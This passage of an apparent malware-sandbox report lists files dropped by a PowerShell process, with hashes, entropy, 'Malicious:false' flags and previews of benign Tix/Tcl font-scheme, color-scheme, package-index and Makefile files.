                                                                                                                                                                                                                      SHA-512:7AB15610EA4C1BBB6591E3C3614E5D93E8153E3C3EB27D5CB5C3AEE57C8F82A085B3F387C29F5DCDFC616663373D2CF92DA0738336B37435CCEC06197C33177B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:package ifneeded Tix 8.4.3 [list load [file join $dir tix84.dll] Tix]..package ifneeded wm_default 1.0 [list source [file join $dir pref WmDefault.tcl]]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):664
                                                                                                                                                                                                                      Entropy (8bit):4.824083128447407
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJkOJS/B03wV0IRDrfKhmexzDIvK3WLeAkjOJIbsIvaII0CsIcRarEIRiIII:nJkOgB040YzKNzl38fuWAsEaI0s7aIOX
                                                                                                                                                                                                                      MD5:CD13DACB9369F291265BB50409A2DC8B
                                                                                                                                                                                                                      SHA1:6BB43B8D1FC65B250E15E7E4378E20F57985723F
                                                                                                                                                                                                                      SHA-256:5AE702DF92CEDD70CDDC9EF51F756BDE17E23F1C5CF6A5D3FC2B9559E05B26FE
                                                                                                                                                                                                                      SHA-512:C94BE6C7E5E7FC3CE5B10502FE8A6FFC1DFFEB31D7DC1158EFBC5C3BC552C90B94D96F89E02EE494688BA0B05FE4FE632EE367772069E2F360FBC2986C5C3A5F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 10Point.fs,v 1.2 2002/01/24 09:17:02 idiscovery Exp $..#....proc tixSetFontset {} {.. global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Sherif"...set fixedfont "Courier New".. } unix {...set font "helvetica"...set fixedfont "courier".. }.... set tixOption(font) [list $font -10].. set tixOption(bold_font) [list $font -10 bold].. set tixOption(menu_font) [list $font -10].. set tixOption(italic_font) [list $font -10 bold italic].. set tixOption(fixed_font) [list $fixedfont -10].. set tixOption(border1) 1..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2090
                                                                                                                                                                                                                      Entropy (8bit):4.8376167866641
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJkoB0E0YzKNzl38fuWAsEaI0s7aIOiI5fdFN9FNAFN5FNH8FNXFNQFNlFN7FNMt:J3v0VyB5HIFGIE5nPv
                                                                                                                                                                                                                      MD5:9C05CFB4CCC69C9F91F190E186B8DBCA
                                                                                                                                                                                                                      SHA1:8A04FCD9B4CA225C0D55F40450E3BA636C187289
                                                                                                                                                                                                                      SHA-256:C0D99286EAE3E39F121ACB971830813298B7F98B01E1341F362302C1378A4D83
                                                                                                                                                                                                                      SHA-512:F57F283CD22433003B49838667EE9B7D9639389B31259DE0A382DC93AF063E2F645582F08C13B91B831D2805018F3DD35CCCBF81A1A00CF322D201C1B65C5C94
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 10Point.fsc,v 1.2 2002/01/24 09:17:02 idiscovery Exp $..#..proc tixPref:InitFontSet:10Point {} { .... global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Sherif"...set fixedfont "Courier New".. } unix {...set font "helvetica"...set fixedfont "courier".. }.... set tixOption(font) [list $font -10].. set tixOption(bold_font) [list $font -10 bold].. set tixOption(menu_font) [list $font -10].. set tixOption(italic_font) [list $font -10 bold italic].. set tixOption(fixed_font) [list $fixedfont -10].. set tixOption(border1) 1....}..proc tixPref:SetFontSet:10Point {} { ..global tixOption..option add *Font...$tixOption(font) $tixOption(prioLevel)..option add *font...$tixOption(font) $tixOption(prioLevel)..option add *Menu.font...$tixOption(menu_font) $tixOption(prioLevel)..option add *TixMenu.font...$tixOption(menu_font) $tixOption(prioLevel)..op
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):663
                                                                                                                                                                                                                      Entropy (8bit):4.828565342700659
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJuOJST03wV0IRDrfKhmexUK3WLeAkjOJIbc/Ivc9oI0Cc/IcRc9LEIRiQ/II:nJuOL40YzKNL38fuWAc/Ec9o0c/7c9o8
                                                                                                                                                                                                                      MD5:7D7D1151A3AA92C57A06BCBF148A8DDE
                                                                                                                                                                                                                      SHA1:BE50EB4A47EE632C27EB90E452D76EC88C4B502A
                                                                                                                                                                                                                      SHA-256:73696FDF63C9C8CD83624EE3A1E95D18688DB9C8F5B2FBA767E9ABAC5B321E55
                                                                                                                                                                                                                      SHA-512:A5A9D823F76CDA7D79CD265C7DBF87C66B170EE3671A9951CE1A11B6AD0A4B601253C612433366050AF4E89FB95321CD4D6752DBAC779513604FD4B3BA66BBF8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 12Point.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetFontset {} {.. global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Serif"...set fixedfont "Courier New".. } unix {...set font "helvetica"...set fixedfont "courier".. }.... set tixOption(font) [list $font -12].. set tixOption(bold_font) [list $font -12 bold].. set tixOption(menu_font) [list $font -12].. set tixOption(italic_font) [list $font -12 bold italic].. set tixOption(fixed_font) [list $fixedfont -12].. set tixOption(border1) 1..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2089
                                                                                                                                                                                                                      Entropy (8bit):4.838682853791342
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJuzW0YzKNL38fuWAc/Ec9o0c/7c9oOiQ/7fdFN9FNAFN5FNH8FNXFNQFNlFN7FK:JJ07yB7/f9ov/A9oE/7nPv
                                                                                                                                                                                                                      MD5:64DF7D1CAFA610376F2F30EC8709CF85
                                                                                                                                                                                                                      SHA1:9F7C02AB5455AF474CA0358A84E81C537459532F
                                                                                                                                                                                                                      SHA-256:3241EDC24AD328801CA6F65DB7F7566CFAF17A38A3BE907B5620D9D9FA885AEE
                                                                                                                                                                                                                      SHA-512:8A1A08ED90C03E062597C08EB675086FAAC290536AEFF69D2BBADD5ADBD89570CA7876593703BD2C43A1A6CF3A44ECD3946C10AA673EF2FAB571A279892CE92D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 12Point.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixPref:InitFontSet:12Point {} { .... global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Serif"...set fixedfont "Courier New".. } unix {...set font "helvetica"...set fixedfont "courier".. }.... set tixOption(font) [list $font -12].. set tixOption(bold_font) [list $font -12 bold].. set tixOption(menu_font) [list $font -12].. set tixOption(italic_font) [list $font -12 bold italic].. set tixOption(fixed_font) [list $fixedfont -12].. set tixOption(border1) 1....}..proc tixPref:SetFontSet:12Point {} { ..global tixOption..option add *Font...$tixOption(font) $tixOption(prioLevel)..option add *font...$tixOption(font) $tixOption(prioLevel)..option add *Menu.font...$tixOption(menu_font) $tixOption(prioLevel)..option add *TixMenu.font...$tixOption(menu_font) $tixOption(prioLevel)..opt
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):661
                                                                                                                                                                                                                      Entropy (8bit):4.843102001687752
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJ4OJST07V0IRDrfKhmexUK3WLeAkjOJIb2xIvOII0C2xIcROrEIRi6xII:nJ4OLB0YzKNL38fuWA2xEH02x7pOi6xt
                                                                                                                                                                                                                      MD5:1158506EB4CE033743C40B6E8E1F0F62
                                                                                                                                                                                                                      SHA1:7CD49F963FB0039D44A6A133A8FE95D336458E29
                                                                                                                                                                                                                      SHA-256:8820F5EC1F4A756235F227AC00E524E0B974341F0F796FC2B269A8F6A832CFEC
                                                                                                                                                                                                                      SHA-512:A3AE47348EAE8E406C17A5E4D1CDBA6C59C790089030EC00A6B1F0291B9EAF9360693C166E3CD76ECD586C0C77F90F7D993763078B0E6BC110FAC66EDC8E45E9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 14Point.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixSetFontset {} {.. global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...# This should be Tahoma for Win2000/XP...set font "MS Sans Serif"...set fixedfont "Courier New".. } unix {...set font "helvetica"...set fixedfont "courier".. }.... set tixOption(font) [list $font -14].. set tixOption(bold_font) [list $font -14 bold].. set tixOption(menu_font) [list $font -14].. set tixOption(italic_font) [list $font -14 bold italic].. set tixOption(fixed_font) [list $fixedfont -14].. set tixOption(border1) 1..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2155
                                                                                                                                                                                                                      Entropy (8bit):4.8392570796674335
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJ4zgDYz0fzmxbD3Xfuh+A2xEH02x7pOi6xkfdFN9FNAFN5FNH8FNXFNQFNlFN7w:JxDbfytjPxLx8Px1+xknPv
                                                                                                                                                                                                                      MD5:ED0CBE4287A48A90EE5C2E998179D47C
                                                                                                                                                                                                                      SHA1:0C0FAD306AAC759927B9ED897D43B1AC38C29CAA
                                                                                                                                                                                                                      SHA-256:718FF155CBDEB67468939B93A9EFDBA9585F526D40526B80D4DDE98EF7254C6B
                                                                                                                                                                                                                      SHA-512:AD969827ED2233DC4C15508D7FAA7E0B3267CD01EBE232086E362E97E8DED3B5F192EBE5AB82D95A6284C2D7A87ACA2FF45F13C8531F101AED130DBB4FDDA292
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: 14Point.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixPref:InitFontSet:14Point {} { ...... global tixOption tcl_platform.... switch -- $tcl_platform(platform) "windows" {...if {$tcl_platform(osVersion) < 5} {... set font "MS Sans Serif"...} else {... set font "Tahoma"...}...set fixedfont "Courier New"...set bd 1.. } unix {...set font "helvetica"...set fixedfont "courier"...set bd 2.. }.... set tixOption(font) [list $font -14].. set tixOption(bold_font) [list $font -14 bold].. set tixOption(menu_font) [list $font -14].. set tixOption(italic_font) [list $font -14 bold italic].. set tixOption(fixed_font) [list $fixedfont -14].. set tixOption(border1) $bd....}..proc tixPref:SetFontSet:14Point {} { ..global tixOption..option add *Font...$tixOption(font) $tixOption(prioLevel)..option add *font...$tixOption(font) $tixOption(prioLevel)..option add *Menu.font...$tixOption(menu_font) $tixOption(prioLevel)..option ad
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                      Entropy (8bit):4.596777344557706
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJ71HAxEd7SEqv9nEIAX8XNXlXpdjdvks3k/1rB4dh:JqxEd7SEqv9nEIAs9VZV9j321l4dh
                                                                                                                                                                                                                      MD5:646556640B596DBFD08279B95395F25B
                                                                                                                                                                                                                      SHA1:7C57AF5A31ED249571202AD90A40CA7F3F82E955
                                                                                                                                                                                                                      SHA-256:25A34D43AFDFF0DBB6EF04308AC0B97CC89343E4EE065ECB61C7D3369B83C589
                                                                                                                                                                                                                      SHA-512:40CC36CF8272A7459EC9E55E5A8495B88C40FC524084CFBD8C26827508D2746F1AE60E0646F2863577314E51E1EC9895280B8CF07D85E94833A444EB2CB6D36E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Bisque.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.. global tixOption.... set tixOption(bg) bisque1.. set tixOption(fg) black.... set tixOption(dark1_bg) bisque2.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) bisque3.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) bisque3.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) bisque1.. set tixOption(light1_fg) white.. set tixOption(light2_bg) bisque1.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) bisque2.. set tixOption(input2_bg) bisque2.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixOption(se
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22877
                                                                                                                                                                                                                      Entropy (8bit):4.895306506162146
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:lVn5Ivo4ybbTpff8Qp8t0Q0vAwYPesp8Qp8EvAERVn5Ivo4ybbTpff8Qp8t0Q0vy:lVneNvAERVneNvAEF
                                                                                                                                                                                                                      MD5:3A535F30256A2FA1BB7024B49C3FE709
                                                                                                                                                                                                                      SHA1:FA2F3C36CFF51ED34A4BF1B89F070821F953C869
                                                                                                                                                                                                                      SHA-256:3BA01C10024B474C2F6B61A6D54C92FD9F95EC4C03A2F3AE6CB806A401004AC0
                                                                                                                                                                                                                      SHA-512:BF9C5FB938051775D386B76CFBAC2ECF3FB8E65C0207122A67046769C2E9F23CADD9613D5341C4AB1AB5DF821ACA2679CBBE1FBD455D3CE585744148F77A3F72
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Bisque.csc,v 1.2 2000/10/12 01:59:13 idiscovery Exp $..#..proc tixPref:SetScheme-Color:Bisque {} {.... global tixOption.... set tixOption(bg) bisque1.. set tixOption(fg) black.... set tixOption(dark1_bg) bisque2.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) bisque3.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) bisque3.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) bisque1.. set tixOption(light1_fg) white.. set tixOption(light2_bg) bisque1.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) bisque2.. set tixOption(input2_bg) bisque2.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1080
                                                                                                                                                                                                                      Entropy (8bit):4.621551821630945
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJo1HAxp/p7STpvJpEGAXhX7XAXrdjdvmLYky0YrBq9b:JPxp/p7STpvJpEGARrwbV9mshtlq9b
                                                                                                                                                                                                                      MD5:E51F1764F33B131B503870161A91B6F4
                                                                                                                                                                                                                      SHA1:1CF60D1C57CDF5F909E010FB1ECB3A66EE7660ED
                                                                                                                                                                                                                      SHA-256:38DC4760292C2C3182B893E48CDC028502BF97E8D12B8F62596F8296D6526595
                                                                                                                                                                                                                      SHA-512:53E60DC01C9B5D5DAA53052516C0F8974035814A20BA304301D5829C355AB7F262495744F00DB533F904A1AEEAA2BDCBC714D17978EF7259042091198EA151EF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Blue.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.. global tixOption.... set tixOption(bg) #9090f0.. set tixOption(fg) black.... set tixOption(dark1_bg) #8080d0.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) #7070c0.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) #8080da.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) #a8a8ff.. set tixOption(light1_fg) black.. set tixOption(light2_bg) #c0c0ff.. set tixOption(light2_fg) black.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray25.... set tixOption(input1_bg) $tixOption(light1_bg).. set tixOption(input2_bg) $tixOption(bg).. set tixOption(output1_bg) $tixOption(light1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) white..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22890
                                                                                                                                                                                                                      Entropy (8bit):4.896050215451635
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:/Vn5Ivo4ybbTpff8Qp8t0Q0vAwYPesp8Qp8EvAE2Vn5Ivo4ybbTpff8Qp8t0Q0vy:/VneNvAE2VneNvAEF
                                                                                                                                                                                                                      MD5:DF7FB0C1468B5560266C14624F70087B
                                                                                                                                                                                                                      SHA1:207632F77576330B13E50A38A648AA5935FF223E
                                                                                                                                                                                                                      SHA-256:209C569C02C014A3AD40FAAD4603D8248C9AA457339BEA9EEA0FD83850717D64
                                                                                                                                                                                                                      SHA-512:F97332BFE390C86A91A90FA29F69602A81F935EF3CA98C6D5010CD1A6703FE5FE0723733051DD1A562D88299CB8F0AE7F34B7A1DFF0E3CC7993514632EDA89C8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Blue.csc,v 1.2 2000/10/12 01:59:28 idiscovery Exp $..#..proc tixPref:SetScheme-Color:Blue {} {.... global tixOption.... set tixOption(bg) #9090f0.. set tixOption(fg) black.... set tixOption(dark1_bg) #8080d0.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) #7070c0.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) #8080da.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) #a8a8ff.. set tixOption(light1_fg) black.. set tixOption(light2_bg) #c0c0ff.. set tixOption(light2_fg) black.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray25.... set tixOption(input1_bg) $tixOption(light1_bg).. set tixOption(input2_bg) $tixOption(bg).. set tixOption(output1_bg) $tixOption(light1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg)
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1081
                                                                                                                                                                                                                      Entropy (8bit):4.604642658691432
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJr1HHxb7S2svnNpEapAXaJpXNXFQ/XpdjdvksSky1rA4/b:JFxb7SJvNpEapAsp98ZV9jSh1c4/b
                                                                                                                                                                                                                      MD5:C4CFD691E350F0876F798B7A5D20790E
                                                                                                                                                                                                                      SHA1:9FE1E84D2F741CBB90A6050B33F4BB33AD0D9414
                                                                                                                                                                                                                      SHA-256:192DFA09F01124F8EEC3E46E2BA26BF5291F91B723C2515645DFB3C10859B307
                                                                                                                                                                                                                      SHA-512:9FD0B96AC4B7FA6A92CCCE6696EEE451684EC77DF0913DD2463E6EC5C6E2C28B921F9152D0206EE5A78C2271CD70B84E6C0820604C8918A56CFA7F7E660317BC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Gray.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray50.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray50.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray90.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) $tixOption(dark1_bg).. set tixOption(input2_bg) $tixOption(bg).. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg)..... set tixOption(select_fg) black..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22891
                                                                                                                                                                                                                      Entropy (8bit):4.8921550369837945
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:f3Vn5Ivo4ybbTpff8Qp8t0Q0vAwYPesp8Qp8EvAEeGVn5Ivo4ybbTpff8Qp8t0Qn:f3VneNvAEeGVneNvAEF
                                                                                                                                                                                                                      MD5:48CCCEFD3B4BE0478D1DE5F59F799FBF
                                                                                                                                                                                                                      SHA1:CA6E9324A007590E4E2A4DC2A7A66E8D6FABAA3A
                                                                                                                                                                                                                      SHA-256:86BCE61B378D6EE3BBC306AD40ADA70F46C528966B3B3F28DF7D0D702D26F04F
                                                                                                                                                                                                                      SHA-512:EC8A0FE920A90A70C8A41174995C4DD73DF76C992D2DF4BC860FE384B4E858FA580B1002444FAAAD9E64CB96BB4A7B271E18DEFCEB149649AC4537DAE6C23556
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Gray.csc,v 1.2 2000/10/12 01:59:44 idiscovery Exp $..#..proc tixPref:SetScheme-Color:Gray {} {...... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray50.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray50.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray90.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) $tixOption(dark1_bg).. set tixOption(input2_bg) $tixOption(bg).. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg)..... set tixOption(select_fg) bl
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:makefile script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):882
                                                                                                                                                                                                                      Entropy (8bit):5.284302765279812
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJnSPcoD2uDPzUfLZeFxUnGrM629OQyzgV37:JSy8IaQNx7
                                                                                                                                                                                                                      MD5:88DE6273E2A0EA8E4D950BDE6BF6927A
                                                                                                                                                                                                                      SHA1:0941900765689F1AF27C0113E3E657C0233196F6
                                                                                                                                                                                                                      SHA-256:830A896C087A5D6DD7ECE2396FA8EB7424B80F7DE1E4B7747B87798139F58848
                                                                                                                                                                                                                      SHA-512:9FDE9D6577D18B5678C41993666485B77B8749CF34A19BBCBB228D2616BAFA8EA658AE2DDED2937CC1DF5BB05FD76E2D970886DE4C1FCCC5A0A4A6E336006AFE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Makefile,v 1.2 2000/10/12 01:45:23 idiscovery Exp $..#..# WARNING..#..# This Makefile is NOT for installation purposes. Please read the file..# docs/Install.html for information about installing Tix...#..#..#..#..#..#..# fs = font scheme source ..# cs = color scheme source ..#..# fsc = font scheme compiled..# csc = color scheme compiled..#.......SUFFIXES: .fs .cs .csc .fsc....all:: FONT_PREF COLOR_PREF....FONT_SRC = 14Point.fs 12Point.fs TK.fs TkWin.fs....FONT_PREF:: ${FONT_SRC:.fs=.fsc}....COLOR_SRC = Bisque.cs Blue.cs Gray.cs SGIGray.cs TixGray.cs TK.cs TkWin.cs....COLOR_PREF:: ${COLOR_SRC:.cs=.csc}....fresh::...-rm -f ${COLOR_SRC:.cs=.csc} FONT_PREF:: ${FONT_SRC:.fs=.fsc}...make.....cs.csc:...tixmkpref -color $< > $@.....fs.fsc:...tixmkpref -font $< > $@....distclean:...- rm -f *.a *.o core errs *~ \#* TAGS *.E a.out errors \....*.ps....clean:: distclean..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):555
                                                                                                                                                                                                                      Entropy (8bit):4.693440334980768
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJF3UST03wW0IeIltrlItLFrlI0iLtyrlI2tyrlIRDBCulII:nJF2n0xclkLRlULUlBUlOdCult
                                                                                                                                                                                                                      MD5:163080368725A02B6A8E4F3A6CC9ED86
                                                                                                                                                                                                                      SHA1:5A477170D4E92BE037550CF8CB470B1E23E3F7EE
                                                                                                                                                                                                                      SHA-256:06C0685AF83FCB93D8E9C9FE05B3B87E6FF97BFD07BC22B68858EB66F3DF1D24
                                                                                                                                                                                                                      SHA-512:3BAD7ECD99072798ABDF88E5BCCEDA6183DF2EDF15B1DD52CA31553B617A281C0B1D274FC188873B4F43234AB27D35EB791D8718EE93F3206BA10179F0FAECF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Old12Pt.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetFontset:12Point {} {.. global tixOption.... set tixOption(font) -*-helvetica-medium-r-normal-*-12-*-*-*-*-*-*-*.. set tixOption(bold_font) -*-helvetica-bold-r-normal-*-12-*-*-*-*-*-*-*.. set tixOption(menu_font) -*-helvetica-bold-o-normal-*-12-*-*-*-*-*-*-*.. set tixOption(italic_font) -*-helvetica-bold-o-normal-*-12-*-*-*-*-*-*-*.. set tixOption(fixed_font) -*-courier-medium-r-*-*-12-*-*-*-*-*-*-*.. set tixOption(border1) 1..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                                                      Entropy (8bit):4.706719520279866
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJzkST07VOWIeIltItL1I0iLteI2teIRDBCBny:nJiBDxokL1ULQBQOdChy
                                                                                                                                                                                                                      MD5:6383ECE6A30E9DE5D62257F775661820
                                                                                                                                                                                                                      SHA1:529D3E3A7BE773CACF1A7BA66A5DA329D60BFE19
                                                                                                                                                                                                                      SHA-256:27C79803B703E84D2C228DD365B52EEB66C2AE95ED21A5419DCB476B5B029ECF
                                                                                                                                                                                                                      SHA-512:8C36B621509AB8C08FB70661EC493D1DB3A8D27C61628C01F9F3253AB42F313D659B64A280A08FC7F1199BCC067BDA626C31AB4515C7B7CB1206EF66FE487407
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: Old14Pt.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixSetFontset {} {.... global tixOption.... set tixOption(font) -*-helvetica-medium-r-normal-*-14-*-*-*-*-*-*-*.. set tixOption(bold_font) -*-helvetica-bold-r-normal-*-14-*-*-*-*-*-*-*.. set tixOption(menu_font) -*-helvetica-bold-o-normal-*-14-*-*-*-*-*-*-*.. set tixOption(italic_font) -*-helvetica-bold-o-normal-*-14-*-*-*-*-*-*-*.. set tixOption(fixed_font) -*-courier-medium-r-*-*-14-*-*-*-*-*-*-*..}..
